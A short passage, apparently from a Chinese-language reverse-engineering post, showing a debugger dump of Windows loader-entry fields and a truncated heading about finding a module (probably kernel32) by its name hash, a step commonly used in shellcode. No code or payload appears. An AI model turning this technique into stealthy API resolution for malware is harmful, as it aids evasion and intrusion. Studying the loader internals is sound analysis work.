+0x03a TlsIndex : 0
+0x03c HashLinks : _LIST_ENTRY [ 0x4c3ff4 - 0x7732eaa0 ]
+0x044 TimeDateStamp : 0x57e92185
+0x048 EntryPointActivationContext : (null)
+0x04c Lock : (null)
+0x050 DdagNode : 0x004c3060 _LDR_DDAG_NODE
+0x054 NodeModuleLink : _LIST_ENTRY [ 0x4c3060 - 0x4c3060 ]
+0x05c LoadContext : (null)
+0x060 ParentDllBase : (null)
+0x064 SwitchBackContext : 0x772210b4 Void
+0x068 BaseAddressIndexNode : _RTL_BALANCED_NODE
+0x074 MappingInfoIndexNode : _RTL_BALANCED_NODE
+0x080 OriginalBase : 0x400000
+0x088 LoadTime : _LARGE_INTEGER 0x01d21999`c5c40e73
+0x090 BaseNameHashValue : 0xc81af258
+0x094 LoadReason : 4 ( LoadReasonDynamicLoad )
+0x098 ImplicitPathOptions : 0
+0x09c ReferenceCount : 2
+0x0a0 DependentLoadFlags : 0
2.通过模块名称hash值找到k
参考